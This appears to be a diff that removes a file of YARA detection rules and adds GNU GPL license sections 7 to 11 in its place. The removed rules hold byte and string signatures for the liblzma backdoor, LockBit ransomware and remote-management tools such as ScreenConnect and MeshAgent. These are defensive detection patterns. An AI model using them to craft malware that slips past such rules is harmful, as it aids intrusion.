-		author = "Costin G. Raiu, Art of Noh, craiu@noh.ro"
-		id = "ca491b9c-400e-5f5e-9372-e403a095edba"
-		date = "2024-03-30"
-		modified = "2024-03-30"
-		reference = "https://gist.github.com/q3k/af3d93b6a1f399de28fe194add452d01"
-		source_url = "https://github.com/craiu/yararules/blob/23cf0ca22021fa3684e180a18416b9ae1b695243/files/unk_liblzma_backdoor.yara#L32-L70"
-		license_url = "https://github.com/craiu/yararules/blob/23cf0ca22021fa3684e180a18416b9ae1b695243/LICENSE"
-		logic_hash = "99f5c82f941bb5c1f908209e108f9f80a835ad84157a383faa0dde502486dbd3"
-		score = 75
-		quality = 85
-		tags = "FILE"
-		version = "1.0"
-
-	strings:
-		$a1 = "yolAbejyiejuvnup=Evjtgvsh5okmkAvj" ascii wide
-		$a2 = { 04 00 10 08 03 00 00 00 03 00 00 00 03 00 00 00 04 00 78 06 03 00 00 00 03 00 00 00 30 00 0C 00 03 00 00 00 04 00 D8 00
-              03 00 00 00 03 00 00 00 03 00 00 00 03 00 00 00 03 00 00 00 43 00 00 00 32 00 00 00 03 00 00 00 03 00 00 00 13 01 00 00
-              92 00 00 00 12 00 00 00 42 00 00 00 93 00 00 00 62 00 00 00 B3 00 00 00 B2 00 00 00 03 00 00 00 03 00 00 00 93 00 00 00
-              42 00 00 00 C3 00 00 00 B2 00 00 00 03 00 00 00 12 00 00 00 04 00 08 07 04 00 08 01 12 00 00 00 63 00 00 00 03 00 00 00
-              13 00 00 00 F2 00 00 00 03 00 00 00 A3 00 00 00 92 00 00 00 33 01 00 00 F2 00 00 00 43 01 00 00 22 00 00 00 22 01 00 00
-              04 00 70 08 22 00 00 00 23 00 00 00 72 01 00 00 B3 01 00 00 92 00 00 00 83 00 00 00 23 00 00 00 82 01 00 00 63 01 00 00
-              13 00 00 00 04 00 A0 01 22 00 00 00 23 00 00 00 72 01 00 00 B3 01 00 00 B2 01 00 00 03 00 00 00 03 00 00 00 03 00 00 00
-              23 01 00 00 43 00 00 00 C2 00 00 00 90 01 30 00 72 00 00 00 21 01 04 00 03 01 00 00 92 00 00 00 22 01 00 00 32 00 00 00 }
-		$a3 = {
-              33 01 00 00 D2 00 00 00 12 00 00 00 13 00 00 00 04 00 40 0C E2 00 00 00 03 00 00 00 53 01 00 00 22 01 00 00 04 00 D0 06
-              E2 00 00 00 A3 00 00 00 92 00 00 00 53 01 00 00 A0 00 14 00 D2 01 00 00 04 00 58 09 62 00 00 00 92 00 00 00 04 00 18 04
-              42 01 00 00 13 00 00 00 B3 01 00 00 04 00 E0 04 33 00 00 00 A2 01 00 00 43 01 00 00 92 00 00 00 A2 00 00 00 33 02 00 00
-              72 01 00 00 10 00 40 00 A0 00 30 00 00 02 20 00 A2 00 00 00 21 00 0C 00 12 00 00 00 04 00 90 07 B2 01 00 00 53 00 00 00
-              93 01 00 00 92 00 00 00 22 01 00 00 83 01 00 00 53 00 00 00 82 00 00 00 32 01 00 00 03 02 00 00 62 01 00 00 63 01 00 00
-              B2 00 00 00 22 01 00 00 33 00 00 00 33 00 00 00 73 00 00 00 04 00 18 00 D2 01 00 00 13 02 00 00 52 00 00 00 D3 00 00 00
-              02 01 00 00 C3 00 00 00 52 00 00 00 D3 00 00 00 B2 01 00 00 A3 01 00 00 23 00 00 00 E2 01 00 00 33 00 00 00 33 00 00 00
-              B3 01 00 00 A2 00 00 00 53 00 00 00 B3 00 00 00 C2 01 00 00 D3 01 00 00 03 00 00 00 22 00 00 00 63 00 00 00 12 00 00 00 }
-
-	condition:
-		( filesize < 15MB ) and ( any of them )
-}
-rule CRAIU_Crime_Lockbit3_Ransomware : FILE
-{
-	meta:
-		description = "Generic LockBit detection, also catches the version used in attacks in Indonesia."
-		author = "Costin G. Raiu, TLPBLACK, craiu@noh.ro"
-		id = "167788a4-a610-5770-9f51-aa4cc4d3d350"
-		date = "2024-07-03"
-		modified = "2024-07-03"
-		reference = "https://www.bleepingcomputer.com/news/security/meet-brain-cipher-the-new-ransomware-behind-indonesia-data-center-attack/"
-		source_url = "https://github.com/craiu/yararules/blob/23cf0ca22021fa3684e180a18416b9ae1b695243/files/crime_lockbit3_ransomware.yara#L2-L32"
-		license_url = "https://github.com/craiu/yararules/blob/23cf0ca22021fa3684e180a18416b9ae1b695243/LICENSE"
-		hash = "eb82946fa0de261e92f8f60aa878c9fef9ebb34fdababa66995403b110118b12"
-		hash = "6e07da23603fbe5b26755df5b8fec19cadf1f7001b1558ea4f12e20271263417"
-		logic_hash = "84efb899315379d85a03959359f89fbcb97cbb6477f1ec439380a4d15fed4f53"
-		score = 75
-		quality = 85
-		tags = "FILE"
-		version = "1.1"
-
-	strings:
-		$a1 = {C3 8BFF53 51 6A0158 0FA2F7C1000000400F95C0 84C074090FC7F0 0FC7F2 59 5B C3 }
-		$a2 = {C3 6A0758 33C90FA2F7C3000004000F95C0 84C074090FC7F8 0FC7FA 59 5B C3 }
-		$a3 = {C3 0F31 8BC8 C1C90D 0F31 8BD0 C1C20D 8BC1 59 5B C3 }
-		$a4 = {55 8BEC 51 52 56 33C0 8B550C 8B7508 AC 33C9 B930000000 8D0C4D01000000 02F1 2AF1 33C9 B906000000 8D0C4D01000000 D3CA 03D0 90 85C0}
-		$a5 = {E9 ?? ?? ?? ?? 6683F841 720C 6683F846 7706 6683E837 EB26 6683F861 720C 6683F866 7706 6683E857 EB14 6683F830 720C 6683F839 7706 6683E830 EB}
-		$a6 = {5D 8BC3 5F 5E 5B 5D C20C00 90 55 8BEC 53 56 57 33C0 8B5D14 33C9 33D2 8B750C 8B7D08 85F6 }
-
-	condition:
-		( filesize < 1MB ) and ( uint16( 0 ) == 0x5a4d ) and ( 2 of them )
-}
-rule CRAIU_Crashstrike : FILE
-{
-	meta:
-		description = "Crowdstrike C-00000???-*.sys files"
-		author = "Costin G. Raiu, Art of Noh, craiu@noh.ro"
-		id = "9a5168c4-0a7f-5269-bafa-728f123a04c5"
-		date = "2024-07-19"
-		modified = "2024-07-19"
-		reference = "https://en.wikipedia.org/wiki/July_2024_global_cyber_outages"
-		source_url = "https://github.com/craiu/yararules/blob/23cf0ca22021fa3684e180a18416b9ae1b695243/files/20240719_crashstrike.yara#L2-L26"
-		license_url = "https://github.com/craiu/yararules/blob/23cf0ca22021fa3684e180a18416b9ae1b695243/LICENSE"
-		hash = "9d001ef3206fe2f955095244e6103ad7f8f318c7c5cbd91a0dd1f33e4217fcb2"
-		logic_hash = "9a8dacf9d95042851073c40f5eab2a6aff61be3a576363ffcd8c21aaec7f0b96"
-		score = 75
-		quality = 85
-		tags = "FILE"
-		version = "1.0"
-
-	strings:
-		$a1 = "000E0A000E0GHijklMNOPqRSTUVwX"
-		$a2 = "AbCDEfghIjklMNoPqrstuV"
-
-	condition:
-		( filesize < 60KB ) and ( uint32( 0 ) == 0xaaaaaaaa ) and ( all of them )
-}
-/*
- * YARA Rule Set
- * Repository Name: DitekSHen
- * Repository: https://github.com/ditekshen/detection
- * Retrieval Date: 2025-06-08
- * Git Commit: e76c93dcdedff04076380ffc60ea54e45b313635
- * Number of Rules: 1440
- * Skipped: 0 (age), 113 (quality), 0 (score), 0 (importance)
- *
- *
- * LICENSE
- *
- * Copyright 2021 by ditekSHen (https://github.com/ditekshen/detection).
-
-The 2-Clause BSD License
-
-Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
-1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
-2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
-THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-
- */
-rule DITEKSHEN_INDICATOR_RMM_Meshagent : FILE
-{
-	meta:
-		description = "Detects MeshAgent. Review RMM Inventory"
-		author = "ditekSHen"
-		id = "3d0baa87-22c9-569d-ba84-37ccaac577b8"
-		date = "2024-10-04"
-		modified = "2024-10-04"
-		reference = "https://www.cisa.gov/sites/default/files/2023-08/JCDC_RMM_Cyber_Defense_Plan_TLP_CLEAR_508c_1.pdf"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_rmm.yar#L3-L27"
-		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "f36c0e23b20e4466100cf4ea2a91515bf1d54505e7b1f0926a4e416a04e0dbcf"
-		score = 75
-		quality = 75
-		tags = "FILE"
-		clamav1 = "INDICATOR.Win.RMM.MeshAgent"
-
-	strings:
-		$x1 = "\\MeshAgent" wide
-		$x2 = "Mesh Agent" wide
-		$x3 = "MeshDummy" wide
-		$x4 = "MeshCentral" wide
-		$x5 = "ILibRemoteLogging.c" ascii
-		$x6 = "AgentCore/MeshServer_" wide
-		$s1 = "var _tmp = 'Detected OS: ' + require('os').Name;" ascii
-		$s2 = "console.log(getSHA384FileHash(process.execPath).toString('hex'))" ascii
-		$s3 = "ScriptContainer.Create(): Error spawning child process, using [%s]" fullword ascii
-		$s4 = "{\"agent\":\"" ascii
-		$s6 = "process.versions.commitHash" fullword ascii
-		$s7 = "console.log('Error Initializing script from Zip file');process._exit();" fullword ascii
-
-	condition:
-		uint16( 0 ) == 0x5a4d and ( 3 of ( $x* ) or ( 1 of ( $x* ) and 3 of ( $s* ) ) or 6 of ( $s* ) )
-}
-
-rule DITEKSHEN_INDICATOR_RMM_Meshagent_CERT : FILE
-{
-	meta:
-		description = "Detects Mesh Agent by (default) certificate. Review RMM Inventory"
-		author = "ditekSHen"
-		id = "b4b52faa-53a5-5ecf-bff8-984994449ee0"
-		date = "2024-10-04"
-		modified = "2024-10-04"
-		reference = "https://www.cisa.gov/sites/default/files/2023-08/JCDC_RMM_Cyber_Defense_Plan_TLP_CLEAR_508c_1.pdf"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_rmm.yar#L29-L42"
-		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "d8ac3aec723a87146be99aefbde5642d095d8d41f69c6f5e9981c39104790d33"
-		score = 75
-		quality = 75
-		tags = "FILE"
-
-	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . issuer contains "MeshCentralRoot-" )
-}
-rule DITEKSHEN_INDICATOR_RMM_Connectwise_Screenconnect : FILE
-{
-	meta:
-		description = "Detects ConnectWise Control (formerly ScreenConnect). Review RMM Inventory"
-		author = "ditekSHen"
-		id = "d752b7e4-b595-56cb-97f1-a60e73160e5a"
-		date = "2024-10-04"
-		modified = "2024-10-04"
-		reference = "https://www.cisa.gov/sites/default/files/2023-08/JCDC_RMM_Cyber_Defense_Plan_TLP_CLEAR_508c_1.pdf"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_rmm.yar#L62-L83"
-		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "43003f97c33c631a2806ce2b82b2367d2452ceb21b0267b5dfe78b350b66924a"
-		score = 75
-		quality = 50
-		tags = "FILE"
-		clamav1 = "INDICATOR.Win.RMM.ConnectWise-ScreenConnect"
-
-	strings:
-		$s1 = "FILESYSCREENCONNECT.CORE, VERSION=" wide
-		$s2 = "feedback.screenconnect.com/Feedback.axd" wide
-		$s3 = /ScreenConnect (Software|Client)/ wide
-		$s4 = "ScreenConnect.InstallerActions!ScreenConnect." wide
-		$s5 = "\\\\.\\Pipe\\TerminalServer\\SystemExecSrvr\\" wide
-		$s6 = "\\jmorgan\\Source\\cwcontrol\\Custom\\DotNetRunner\\" wide
-		$s7 = "ScreenConnect." ascii
-		$s8 = "\\ScreenConnect.Core.pdb" ascii
-		$s9 = "relay.screenconnect.com" ascii
-
-	condition:
-		( uint16( 0 ) == 0x5a4d or uint16( 0 ) == 0xcfd0 ) and 3 of them
-}
-
-rule DITEKSHEN_INDICATOR_RMM_Connectwise_Screenconnect_CERT : FILE
-{
-	meta:
-		description = "Detects ConnectWise Control (formerly ScreenConnect) by (default) certificate. Review RMM Inventory"
-		author = "ditekSHen"
-		id = "7a032c24-8a9e-51c3-983e-62e13594aa35"
-		date = "2024-10-04"
-		modified = "2024-10-04"
-		reference = "https://www.cisa.gov/sites/default/files/2023-08/JCDC_RMM_Cyber_Defense_Plan_TLP_CLEAR_508c_1.pdf"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_rmm.yar#L85-L99"
-		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "14291bd9ddb7fd3ee7932f8104687aae58fe7f5de13726153e5e1ee9c211f598"
-		score = 75
-		quality = 75
-		tags = "FILE"
-
-	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . issuer contains "DigiCert" and pe.signatures [ i ] . subject contains "Connectwise, LLC" )
-}
-rule DITEKSHEN_INDICATOR_RMM_Fleetdeck_Agent : FILE
-{
-	meta:
-		description = "Detects FleetDeck Agent. Review RMM Inventory"
-		author = "ditekSHen"
-		id = "342a196c-1c5c-5951-85e4-d288311b4980"
-		date = "2024-10-04"
-		modified = "2024-10-04"
-		reference = "https://www.cisa.gov/sites/default/files/2023-08/JCDC_RMM_Cyber_Defense_Plan_TLP_CLEAR_508c_1.pdf"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_rmm.yar#L101-L123"
-		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "121e59ea0088c519b618e740b57c560d60cced4a48c9d468e6bf1ab22fa8c8ff"
-		score = 75
-		quality = 75
-		tags = "FILE"
-		clamav1 = "INDICATOR.Win.RMM.FleetDeckAgent"
-
-	strings:
-		$s1 = "fleetdeck.io/" ascii
-		$s2 = "load FleetDeck agent" ascii
-		$s3 = ".dev1.fleetdeck.io" ascii
-		$s4 = "remoteDesktopSessionMutex" ascii
-		$s5 = "main.remoteDesktopWatchdog" fullword ascii
-		$s6 = "main.virtualTerminalWatchdog" fullword ascii
-		$s7 = "main.meetRemoteDesktop" fullword ascii
-		$s8 = "repo.senri.se/prototype3/" ascii
-		$s9 = "main.svcIpcClient" fullword ascii
-		$s10 = "main.hookMqttLogging" fullword ascii
-
-	condition:
-		uint16( 0 ) == 0x5a4d and 4 of them
-}
-rule DITEKSHEN_INDICATOR_RMM_Fleetdeck_Commander : FILE
-{
-	meta:
-		description = "Detects FleetDeck Commander. Review RMM Inventory"
-		author = "ditekSHen"
-		id = "27d533b5-7a66-507e-8ef8-ad9a6cd39ab1"
-		date = "2024-10-04"
-		modified = "2024-10-04"
-		reference = "https://www.cisa.gov/sites/default/files/2023-08/JCDC_RMM_Cyber_Defense_Plan_TLP_CLEAR_508c_1.pdf"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_rmm.yar#L125-L143"
-		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "feee888c6649af0d8e8b08a38dda0bf7970089cf064f58b8bd9c6ebd8378e094"
-		score = 75
-		quality = 75
-		tags = "FILE"
-		clamav1 = "INDICATOR.Win.RMM.FleetDeckCommander"
-
-	strings:
-		$s1 = "Software\\Microsoft\\FleetDeck Commander" ascii
-		$s2 = "fleetdeck.io/prototype3/" ascii
-		$s3 = "fleetdeck_commander_launcher.exe" ascii
-		$s4 = "fleetdeck_commander_svc.exe" ascii
-		$s5 = "|FleetDeck Commander" ascii
-		$s6 = "c:\\agent\\_work\\66\\s\\" ascii
-
-	condition:
-		uint16( 0 ) == 0x5a4d and 4 of them
-}
-rule DITEKSHEN_INDICATOR_RMM_Fleetdeck_Commander_SVC : FILE
-{
-	meta:
-		description = "Detects FleetDeck Commander SVC. Review RMM Inventory"
-		author = "ditekSHen"
-		id = "c03b61b4-36d0-5d38-9af8-e78b9930231f"
-		date = "2024-10-04"
-		modified = "2024-10-04"
-		reference = "https://www.cisa.gov/sites/default/files/2023-08/JCDC_RMM_Cyber_Defense_Plan_TLP_CLEAR_508c_1.pdf"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_rmm.yar#L145-L162"
-		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "20bd69df3d058c24f83af312671cf249a3f26f54ef2e60f6b5b48a5bdb21b68b"
-		score = 75
-		quality = 75
-		tags = "FILE"
-		clamav1 = "INDICATOR.Win.RMM.FleetDeckCommander-SVC"
-
-	strings:
-		$s1 = "fleetdeckfork/execfuncargs(" ascii
-		$s2 = "REG ADD HKEY_CLASSES_ROOT\\%s /V \"URL Protocol\" /T REG_SZ /F" ascii
-		$s3 = "proceed: *.fleetdeck.io" ascii
-		$s4 = "fleetdeck.io/prototype3/commander_svc" ascii
-		$s5 = "commanderupdate.fleetdeck.io" ascii
+additional terms that apply to those files, or a notice indicating
+where to find the applicable terms.
 
-	condition:
-		uint16( 0 ) == 0x5a4d and 4 of them
-}
-rule DITEKSHEN_INDICATOR_RMM_Fleetdeck_Commander_Launcher : FILE
-{
-	meta:
-		description = "Detects FleetDeck Commander Launcher. Review RMM Inventory"
-		author = "ditekSHen"
-		id = "9a4a221e-7a7a-5008-b509-7f01e4a3eea6"
-		date = "2024-10-04"
-		modified = "2024-10-04"
-		reference = "https://www.cisa.gov/sites/default/files/2023-08/JCDC_RMM_Cyber_Defense_Plan_TLP_CLEAR_508c_1.pdf"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_rmm.yar#L164-L178"
-		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "9429f55f162eebc58a7a9af8706244438cb76b1f0987facbb52d29997ed48b95"
-		score = 75
-		quality = 75
-		tags = "FILE"
-		clamav1 = "INDICATOR.Win.RMM.FleetDeckCommander-Launcher"
+  Additional terms, permissive or non-permissive, may be stated in the
+form of a separately written license, or stated as exceptions;
+the above requirements apply either way.
 
-	strings:
-		$s1 = "fleetdeck.io/prototype3/commander_launcher" ascii
-		$s2 = "FleetDeck Commander Launcher" ascii
+  8. Termination.
 
-	condition:
-		uint16( 0 ) == 0x5a4d and all of them
-}
+  You may not propagate or modify a covered work except as expressly
+provided under this License.  Any attempt otherwise to propagate or
+modify it is void, and will automatically terminate your rights under
+this License (including any patent licenses granted under the third
+paragraph of section 11).
 
-rule DITEKSHEN_INDICATOR_RMM_Fleetdeck_CERT : FILE
-{
-	meta:
-		description = "Detects FleetDeck agent by (default) certificate. Review RMM Inventory"
-		author = "ditekSHen"
-		id = "49a6b0bb-599a-54b0-85bc-b2f6849e3ae8"
-		date = "2024-10-04"
-		modified = "2024-10-04"
-		reference = "https://www.cisa.gov/sites/default/files/2023-08/JCDC_RMM_Cyber_Defense_Plan_TLP_CLEAR_508c_1.pdf"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_rmm.yar#L180-L198"
-		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "8f72713eb4a5d9d32629351b937eee7de5d83abe1cd409cd8c3a8c9c52e6e490"
-		score = 75
-		quality = 75
-		tags = "FILE"
+  However, if you cease all violation of this License, then your
+license from a particular copyright holder is reinstated (a)
+provisionally, unless and until the copyright holder explicitly and
+finally terminates your license, and (b) permanently, if the copyright
+holder fails to notify you of the violation by some reasonable means
+prior to 60 days after the cessation.
 
-	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( ( pe.signatures [ i ] . issuer contains "Sectigo Limited" or pe.signatures [ i ] . issuer contains "COMODO CA Limited" ) and pe.signatures [ i ] . subject contains "FleetDeck Inc" )
-}
-rule DITEKSHEN_INDICATOR_RMM_Pdqconnect_Agent : FILE
-{
-	meta:
-		description = "Detects PDQ Connect Agent. Review RMM Inventory"
-		author = "ditekSHen"
-		id = "067e75a3-291b-500f-865d-8758eebe91e7"
-		date = "2024-10-04"
-		modified = "2024-10-04"
-		reference = "https://www.cisa.gov/sites/default/files/2023-08/JCDC_RMM_Cyber_Defense_Plan_TLP_CLEAR_508c_1.pdf"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_rmm.yar#L200-L227"
-		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "34d0b07925551d1b08b86aa226c59aba569b6548cfa00a86ce6b1f271e427662"
-		score = 75
-		quality = 75
-		tags = "FILE"
+  Moreover, your license from a particular copyright holder is
+reinstated permanently if the copyright holder notifies you of the
+violation by some reasonable means, this is the first time you have
+received notice of violation of this License (for any work) from that
+copyright holder, and you cure the violation prior to 30 days after
+your receipt of the notice.
 
-	strings:
-		$api1 = "/devices/register" ascii
-		$api2 = "/devices/socket/websocket?device_id=" ascii
-		$api3 = "/devices/tasks" ascii
-		$api4 = "/devices/auth-challenge" ascii
-		$api5 = "/devices/receiver/Url" ascii
-		$s1 = "sign_pdq.rs" ascii
-		$s2 = "x-pdq-dateCredential=(.+?)/" ascii
-		$s3 = "pdq-connect-agent" ascii
-		$s4 = "PDQ Connect Agent" ascii
-		$s5 = "PDQConnectAgent" ascii
-		$s6 = "PDQConnectAgentsrc\\logger.rs" ascii
-		$s7 = "-PDQ-Key-IdsUser-Agent" ascii
-		$s8 = "\\PDQ\\PDQConnectAgent\\" ascii
-		$s9 = "\\pdq_connect_agent.pdb" ascii
-		$s10 = "task_ids[]PDQ rover" ascii
-		$s11 = "https://app.pdq.com/" ascii
+  Termination of your rights under this section does not terminate the
+licenses of parties who have received copies or rights from you under
+this License.  If your rights have been terminated and not permanently
+reinstated, you do not qualify to receive new licenses for the same
+material under section 10.
 
-	condition:
-		( uint16( 0 ) == 0x5a4d or uint16( 0 ) == 0xcfd0 ) and ( 4 of ( $s* ) or ( 3 of ( $api* ) and 1 of ( $s* ) ) )
-}
+  9. Acceptance Not Required for Having Copies.
 
-rule DITEKSHEN_INDICATOR_RMM_Pdqconnect_Agent_CERT : FILE
-{
-	meta:
-		description = "Detects PDQ Connect Agent by (default) certificate. Review RMM Inventory"
-		author = "ditekSHen"
-		id = "7e830cf0-8f47-5b38-85cd-9777a6878cf1"
-		date = "2024-10-04"
-		modified = "2024-10-04"
-		reference = "https://www.cisa.gov/sites/default/files/2023-08/JCDC_RMM_Cyber_Defense_Plan_TLP_CLEAR_508c_1.pdf"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_rmm.yar#L229-L243"
-		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "373a32b8bfd8c4295ba0c0302a217ccfbb7c7c616f91035097adbc5384b8afdb"
-		score = 75
-		quality = 75
-		tags = "FILE"
+  You are not required to accept this License in order to receive or
+run a copy of the Program.  Ancillary propagation of a covered work
+occurring solely as a consequence of using peer-to-peer transmission
+to receive a copy likewise does not require acceptance.  However,
+nothing other than this License grants you permission to propagate or
+modify any covered work.  These actions infringe copyright if you do
+not accept this License.  Therefore, by modifying or propagating a
+covered work, you indicate your acceptance of this License to do so.
 
-	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . issuer contains "DigiCert, Inc." and pe.signatures [ i ] . subject contains "PDQ.com Corporation" )
-}
-rule DITEKSHEN_INDICATOR_RMM_Pulseway_Pcmontasksrv : FILE
-{
-	meta:
-		description = "Detects Pulseway pcmontask and service user agent responsible for Remote Control, Screens View, Computer Lock, etc"
-		author = "ditekSHen"
-		id = "83901679-ffff-5710-b472-ece592e6764f"
-		date = "2024-10-04"
-		modified = "2024-10-04"
-		reference = "https://www.cisa.gov/sites/default/files/2023-08/JCDC_RMM_Cyber_Defense_Plan_TLP_CLEAR_508c_1.pdf"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_rmm.yar#L245-L266"
-		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "80ba217960dd1ddeb220545c1cccbe96d9b676d327364e1ca8a9dde2b059261f"
-		score = 75
-		quality = 75
-		tags = "FILE"
-		clamav1 = "INDICATOR.Win.RMM.PulseWay"
+  10. Automatic Licensing of Downstream Recipients.
 
-	strings:
-		$s1 = "MM.Monitor." ascii
-		$s2 = "RDAgentSessionSettingsV" ascii
-		$s3 = "CheckForMacOSRemoteDesktopUpdateCompletedEvent" ascii
-		$s4 = "ConfirmAgentStarted" ascii
-		$s5 = "GetScreenshot" ascii
-		$s6 = "UnloadRemoteDesktopDlls" ascii
-		$s7 = "CtrlAltDeleteProc" ascii
-		$s8 = "$7cfc3b88-6dc4-49fc-9f0a-bf9e9113a14d" ascii
-		$s9 = "computermonitor.mmsoft.ro" ascii
+  Each time you convey a covered work, the recipient automatically
+receives a license from the original licensors, to run, modify and
+propagate that work, subject to this License.  You are not responsible
+for enforcing compliance by third parties with this License.
 
-	condition:
-		( uint16( 0 ) == 0x5a4d or uint16( 0 ) == 0xcfd0 ) and 7 of them
-}
-rule DITEKSHEN_INDICATOR_RMM_Pulseway_Remotedesktop : FILE
-{
-	meta:
-		description = "Detects Pulseway Rempte Desktop client"
-		author = "ditekSHen"
-		id = "8bca3cef-b24f-597a-a6e2-86040ed726f4"
-		date = "2024-10-04"
-		modified = "2024-10-04"
-		reference = "https://www.cisa.gov/sites/default/files/2023-08/JCDC_RMM_Cyber_Defense_Plan_TLP_CLEAR_508c_1.pdf"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_rmm.yar#L268-L286"
-		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "a542c11f21ab48f4da69df4e7cb46531658a714687e2c2f8ccf78dc2a0338b68"
-		score = 75
-		quality = 75
-		tags = "FILE"
-		clamav1 = "INDICATOR.Win.RMM.PulseWay"
+  An "entity transaction" is a transaction transferring control of an
+organization, or substantially all assets of one, or subdividing an
+organization, or merging organizations.  If propagation of a covered
+work results from an entity transaction, each party to that
+transaction who receives a copy of the work also receives whatever
+licenses to the work the party's predecessor in interest had or could
+give under the previous paragraph, plus a right to possession of the
+Corresponding Source of the work from the predecessor in interest, if
+the predecessor has it or can get it with reasonable efforts.
 
-	strings:
-		$s1 = "RemoteControl" ascii
-		$s2 = "MM.Monitor.RemoteDesktopClient." ascii
-		$s3 = "MM.Monitor.RemoteControl" ascii
-		$s4 = "RemoteDesktopClientUpdateInfo" ascii
-		$s5 = "ShowRemoteDesktopEnabledSystemsOnly" ascii
-		$s6 = "$31f50968-d45c-49d6-ace9-ebc790855a51" ascii
+  You may not impose any further restrictions on the exercise of the
+rights granted or affirmed under this License.  For example, you may
+not impose a license fee, royalty, or other charge for exercise of
+rights granted under this License, and you may not initiate litigation
+(including a cross-claim or counterclaim in a lawsuit) alleging that
+any patent claim is infringed by making, using, selling, offering for
+sale, or importing the Program or any portion of it.
 
-	condition:
-		( uint16( 0 ) == 0x5a4d or uint16( 0 ) == 0xcfd0 ) and 5 of them
-}
+  11. Patents.
 
-rule DITEKSHEN_INDICATOR_RMM_Pulseway_CERT : FILE
-{
-	meta:
-		description = "Detects PulseWay by (default) certificate. Review RMM Inventory"
-		author = "ditekSHen"
-		id = "e00f51dc-261e-5a38-89ed-1899d9b522d4"
-		date = "2024-10-04"
-		modified = "2024-10-04"
-		reference = "https://www.cisa.gov/sites/default/files/2023-08/JCDC_RMM_Cyber_Defense_Plan_TLP_CLEAR_508c_1.pdf"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_rmm.yar#L288-L302"
-		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
